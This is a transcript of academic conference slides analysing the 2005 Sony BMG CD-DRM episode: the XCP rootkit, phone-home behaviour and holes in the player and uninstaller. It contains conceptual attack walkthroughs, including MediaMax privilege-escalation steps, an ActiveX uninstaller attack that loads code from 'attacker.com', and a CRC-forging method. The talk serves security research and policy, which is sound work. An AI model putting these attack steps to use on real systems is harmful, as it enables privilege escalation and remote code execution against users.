1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.

Slides:



Advertisements
Similar presentations
Keep Your PC Safe (Windows 7, Vista or XP) Nora Lucke 02/05/2012 Documents - security.
Advertisements

Let’s Talk About Cyber Security
Thank you to IT Training at Indiana University Computer Malware.
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.
Day anti-virus anti-virus 1 detecting a malicious file malware, detection, hiding, removing.
1 The Sony CD DRM Debacle A case study of digital rights management.
US Copyright Law & Protecting Your Privacy On-Line Marty Manjak Information Security Officer.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.
CD DRM & SONY-BMG: a case study Muhammed Afzal Hussain Digital Rights Management Seminar 17 th May, 2006.
1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.
To Protect or Not Protect Sony/BMG’s DRM Dilemma Sony’s Attempt-- Sony/BMG’s digital right’s management (DRM) “rootkit” inclusion on their music.
Web Security A how to guide on Keeping your Website Safe. By: Robert Black.
The Downside to DRM. What is DRM? “Digital Rights Management” Software used to control access to copyrighted material Protect company from piracy.
Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.
Rootkits: Sneaky, Stealthy Toolboxes
Computer Security and Penetration Testing
February 28, The Sony BMG DRM Debacle Corynne McSherry, Staff Attorney.
Chapter Nine Maintaining a Computer Part III: Malware.
Microsoft ® Official Course Module 9 Configuring Applications.
© 2008 The McGraw-Hill Companies, Inc. All rights reserved. M I C R O S O F T ® Preparing for Electronic Distribution Lesson 14.
First Community Bank Prevx Safe Online Rollout & Best Practice Presentation.
The World-Wide Web. Why we care? How much of your personal info was released to the Internet each time you view a Web page? How much of your personal.
Computer Concepts – Illustrated 8 th edition Unit C: Computer Software.
Using Windows Firewall and Windows Defender
Malware Fighting Spyware, Viruses, and Malware Ch 4.
Networking Security Chapter 8 powered by dj. Chapter Objectives  Explain various security threats  Monitor security in Windows Vista  Explain basic.
Windows Vista Security Center Chapter 5(WV): Protecting Your Computer 9/17/20151Instructor: Shilpa Phanse.
JavaScript, Fourth Edition
1 J. Alex Halderman Legal Challenges in Security Research J. Alex Halderman Center for Information Technology Policy Department of Computer Science Princeton.
Rootkits. EC-Council The Problem  Microsoft Corp. security researchers are warning about a new generation of powerful system-monitoring programs, or.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Eng. Hector M Lugo-Cordero, MS CIS4361 Department of Electrical Engineering and Computer Science February, 2012 University of Central Florida.
ColdFusion Security Michael Smith President TeraTech, Inc ColdFusion, Database & VB custom development
Mathieu Castets October 17th,  What is a rootkit?  History  Uses  Types  Detection  Removal  References 2/11.
Virus and anti virus. Intro too anti virus Microsoft Anti-Virus (MSAV) was an antivirus program introduced by Microsoft for its MS-DOS operating system.
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.
3.05 Protect Your Computer and Information Unit 3 Internet Basics.
INTERNET SAFETY FOR KIDS
COSC 513 Operating Systems Project Presentation: Internet Security Instructor: Dr. Anvari Student: Ying Zhou Spring 2003.
Computer security By Isabelle Cooper.
Evaluating New Copy-Prevention Techniques For Audio CDs John A. Halderman 2002 ACM Workshop on Digital Rights Management (DRM 2002) Available at
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
Matthew Glenn AP2 Techno for Tanzania This presentation will cover the different utilities on a computer.
"Most people, I think, don't even know what a rootkit is, so why should they care about it?" - Thomas Hesse, President of Sony's Global Digital Business.
Lecture 5 Rootkits Hoglund/Butler (Chapters 1-3).
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Adware and Browser Hijacker – Symptoms and Preventions /killmalware /u/2/b/ /alexwaston14/viru s-removal/ /channel/UC90JNmv0 nAvomcLim5bUmnA.
Digital Rights Management Zach Milko. Overview Definition Why it exists DRM Today  Fairplay Opponents of DRM  DefectiveByDesign.org Future Conclusion.
Active X and Signed Applets Chad Bollard. Overview ActiveX  Security Features  Hidden Problems Signed Applets  Security Features  Security Problems.
CIW Lesson 8 Part B. Malicious Software application that installs hidden services on systems term for software whose specific intent is to harm computer.
By Kyle Bickel.  Securing a host computer is making sure that your computer is secure when it’s connected to the internet  This be done by several protective.
Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.
By the end of this lesson you will be able to: 1. Determine the preventive support measures that are in place at your school.
SemiCorp Inc. Presented by Danu Hunskunatai GGU ID #
Windows Vista Configuration MCTS : Internet Explorer 7.0.
Instructor: Syed Shuja Hussain Chapter 4: Operating System Basics.
Botnets A collection of compromised machines
Chapter 6 Application Hardening
Common Methods Used to Commit Computer Crimes
Rootkit A rootkit is a set of tools which take the ability to access a computer or computer network at administrator level. Generally, hackers install.
Botnets A collection of compromised machines
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
ACROSS THE WORLD MCAFEE PROVIDING THE UPDATE PROTECTION SOLUTIONS TO THE COMPUTER USERS. AS SAME TO THE ERROR ABOVE, WAIT FOR FEW MINUTES AND THINK SOME.
By Jake Schmitt, Seth Raleigh, Neil McLain
Virus Attack Final Presentation
Presentation transcript:

1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University

2 J. Alex Halderman The “Episode” – Fall 2005 World’s second largest music company Major anti-piracy plan, gone badly awry Millions of copies of dangerous software Hundreds of thousands of PCs at risk International protests, class-action suits Multi-million dollar recall, settlements Case study of digital rights management

3 J. Alex Halderman Cast of Characters First4InternetSunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs

4 J. Alex Halderman In Today’s Talk 1.How CD DRM works 2.Vulnerabilities –The XCP Rootkit –Spyware-like Behaviors –MediaMax Player Hole –Uninstaller Holes 3.Conclusions Content protection problems  User security problems Lessons for security and IT policy communities Focus: Vulnerabilities for end users, not holes in content protection

5 J. Alex Halderman What is CD DRM? CD Players Plays normally Computers Restricted use e.g. Can’t copy disc Can’t rip as MP3 Can’t use on iPod

6 J. Alex Halderman Passive Protection Drivers Ripper/copier Application OS   Modify data format to confuse hardware or OS

7 J. Alex Halderman Active Protection Drivers Ripper/copier Application OS Protection software Install protection driver that breaks applications 

8 J. Alex Halderman Active Protection First time protected CD is inserted… –Autorun (normal Windows feature) executes installer from the CD –Installs active protection driver –Remains on system Drivers Ripper/copier Application OS Protection driver

9 J. Alex Halderman Active Protection Drivers Ripper/copier Application OS Protection driver Normal CD Drivers Ripper/copier Application OS Protection driver  # CD marked as protected User tries to rip or copy a disc… –Active protection software interposes between CD driver and app –Checks disc — should deny access? –If yes, introduces errors into audio

10 J. Alex Halderman Defeating Active Protection Prevent installation –Infamous shift key ‘attack’ (disables autorun) –Turn autorun off –Use Linux, Mac OS, etc. Interfere with disc detection Disable or remove protection drivers

11 J. Alex Halderman XCP Rootkit: Motivation Content protection problem: Users will remove active protection software XCP response: Actively conceal processes, files, registry keys

12 J. Alex Halderman The XCP Rootkit

13 J. Alex Halderman XCP Rootkit: Discovery Mark Russinovich October 31, 2005

14 J. Alex Halderman XCP Rootkit: Operation KeQueryDirectoryFile0x8060bb9c KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel Normal Windows system call (List files in a directory)

15 J. Alex Halderman KeQueryDirectoryFile0x0f967bfa KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel int Rootkit_QueryDirectoryFile(…) {… if filename begins with “$sys$”: remove from results 0xf967bfa: Rootkit (Aries.sys) XCP Rootkit: Operation

16 J. Alex Halderman XCP Rootkit: Operation Magic prefix: $sys$ –Files –Processes –Registry keys Exception: If calling process starts with $sys$, can see everything Hidden

17 J. Alex Halderman XCP Rootkit: Problems Local privilege escalation –All marked files, processes, and registry keys hidden — not limited to XCP software –Malware ran by non-privileged users can’t install own rootkit, but can utilize XCP’s –Use to hide from virus checkers, admin tools Exploits in wild –Backdoor.Ryknos.B, Trojan.Welomoch

18 J. Alex Halderman XCP Rootkit: Reaction “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse President, Sony BMG Global Digital Business (Nov. 4) “It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.” — Stewart Baker Asst. U.S. Secretary of Homeland Security (Nov. 14) Nov. 3:Sony releases first patch to remove rootkit Nov. 10:First class action lawsuits filed against Sony Nov. 15: Sony recalls XCP discs

19 J. Alex Halderman XCP Rootkit: Lessons Dangerous XCP CDs on sale for six months (~2 million discs) before rootkit revealed Not detected by any commercial anti-virus or anti-spyware software Security vendors need to better scrutinize software from major content companies (no matter how worthy their goals).

20 J. Alex Halderman XCP and MediaMax Players

21 J. Alex Halderman Spyware-like Behavior Both XCP and MediaMax: “Phone home” about each album played –Purpose: Platform monetization (sell ads) –Vendor learns album ID, IP address –Sometimes can link IP and address –Not disclosed in EULAs or privacy policies POST /perfectplacement/retrieveassets.asp?id= 7F63A4FD-9FBD-486B-B473-D18CC92D05C0 HTTP/1.1 Host: license.sunncomm2.com

22 J. Alex Halderman Spyware-like Behavior Both XCP and MediaMax: Ship without a meaningful uninstaller Install without consent or exceed consent –Both: Block access to many CDs, not just one –XCP: Installs undisclosed rootkit –MediaMax: Installs 13+ MB, even if user declines

23 J. Alex Halderman CD DRM Players: Lessons Spyware hard to define, but certain behaviors clearly contrary to norms Goal: Informed consent, particularly regarding controversial behaviors

24 J. Alex Halderman MediaMax Player: Motivation Content protection problem: –Users will decline to install active protection –Platform building very lucrative for vendor Incentive mismatch between vendor and label MediaMax response: Install aggressively, regardless of consent

25 J. Alex Halderman MediaMax Player: Problem

26 J. Alex Halderman MediaMax Player: Problem Everyone — Full Control Will be reset to insecure state next time CD is inserted

27 J. Alex Halderman MediaMax Player: Attack 1 (Jesse Burns and Alex Stamos) 1.Non-privileged user replaces MMX.exe with attack version 2.Privileged user plays CD 3.Attack code runs with privileges

28 J. Alex Halderman MediaMax Player: Attack 2 1.Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function 2.Non-privileged user replaces installed file with attack version 3.Privileged user inserts CD 4.Even before displaying a EULA, software on CD calls MediaMax.dll code to check version 5.Attack code runs with privileges

29 J. Alex Halderman MediaMax Player: Attack 2 Sony patch for first attack checks MediaMax.dll version (avoid deactivating future DRM versions?) If already booby-trapped, patch will set off the attack code! Vulnerable even if never accepted EULA

30 J. Alex Halderman MediaMax Player: Lessons Aggressive DRM can make other security problems harder to fix Vendors may take longer to fix security problems when doing so may weaken content protection

31 J. Alex Halderman XCP and MediaMax Uninstallers

32 J. Alex Halderman Uninstallers: Motivation Content protection problem: Angry customers demand the ability to remove active protection software –E.g., to resolve security problems XCP and MediaMax response: Make uninstallers hard to get, use online design to limit who can use them

33 J. Alex Halderman XCP Uninstaller: Step 1

34 J. Alex Halderman XCP Uninstaller: Step 2 Wait for (hours)

35 J. Alex Halderman XCP Uninstaller: Step 3

36 J. Alex Halderman XCP Uninstaller: Step 4 Wait for second (several days)

37 J. Alex Halderman XCP Uninstaller: Step 5 Finally, visit web page and run uninstaller (But if you insert the CD again, go back to step 1!)

38 J. Alex Halderman XCP Uninstaller: Operation “HTTP GET /XCP.dat” XCP Uninstall web page: CodeSupport.Uninstall(“ Server sony-bmg.com XCP.dat Client CodeSupport.ocx Client extracts InstallLite.dll from XCP.dat, calls function UnInstall.xcp ActiveX control will accept arbitrary URL Code from that URL is not authenticated Control is not removed after use Problems:

39 J. Alex Halderman XCP Uninstaller: Attack “HTTP GET /Evil.dat” Victim visits attacker’s web page: CodeSupport.Uninstall(“ Server attacker.com Evil.dat Client CodeSupport.ocx Client extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP Attack code runs with local user’s privileges Attacker constructs Evil.dat1. Creates InstallLite.dll and puts attack code in UninstallXCP function

40 J. Alex Halderman Constructing Evil.dat Archive files protected with proprietary CRC 1.Prepare Evil.dat with random CRC 2.Run with breakpoint at line 2 3.Take computed CRC and place in Evil.dat Header: Name=“UninstallXCP.dat” CRC=0x03cb1a88 ActiveX control: 1.C = ComputeCRC( ) 2.If C != Header.CRC then Terminate 3.Extract and execute file Lesson: Use a digital signature!

41 J. Alex Halderman MediaMax Uninstaller “Oops!... I did it again”

42 J. Alex Halderman MediaMax Uninstaller “GET /validate.asp?key=3984-…” MediaMax Uninstall web page: AxWebRemove.Remove( , “ Server sunncomm.com “ Client AxWebRemove.ocx Client calls function ECF7() from WebRem.dll “GET /webrem.dll” Server sunncomm.com WebRem.dll Client AxWebRemove.ocx 3.

43 J. Alex Halderman Uninstallers: Lessons Content security problems complicate design of software systems, inviting security problems Resources devoted to content security at expense of user security may allow simple vulnerabilities to slip through

44 J. Alex Halderman Chronology 31Oct. 3Nov Dec Oct.31Rootkit revealed Nov.3 Sony releases XCP patch 10First suits filed against Sony 14XCP patch/uninstaller hole 15Sony recalls XCP discs 17 MediaMax uninstaller hole Dec.6MediaMax player hole 7Hole in patch for MediaMax player hole 30First suits settled

45 J. Alex Halderman Aftermath XCP discs recalled; MediaMax halted (but still on many store shelves) Major class-action suits settled –Customers can trade discs for cash, downloads, and non-DRM versions State, Federal governments still investigating Sony won’t use CD DRM, for now

46 J. Alex Halderman Conclusions DRM poses threats to user security and privacy Security community/policymakers must be wary, despite worthy goal of protecting copyright Even major content vendors should be scrutinized

47 J. Alex Halderman Conclusions Efficacy of DRM can be inversely related to user’s ability to defend against security threats –Users need to understand and control operation of the computer –Some DRM systems rely on undermining understanding and control (XCP rootkit)

48 J. Alex Halderman The Stakes are High! Bad DRM can… –Harm users –Create major liability for content owners –Reduce sales for artists –Ultimately, reduce incentive to create

49 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University Paper:

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.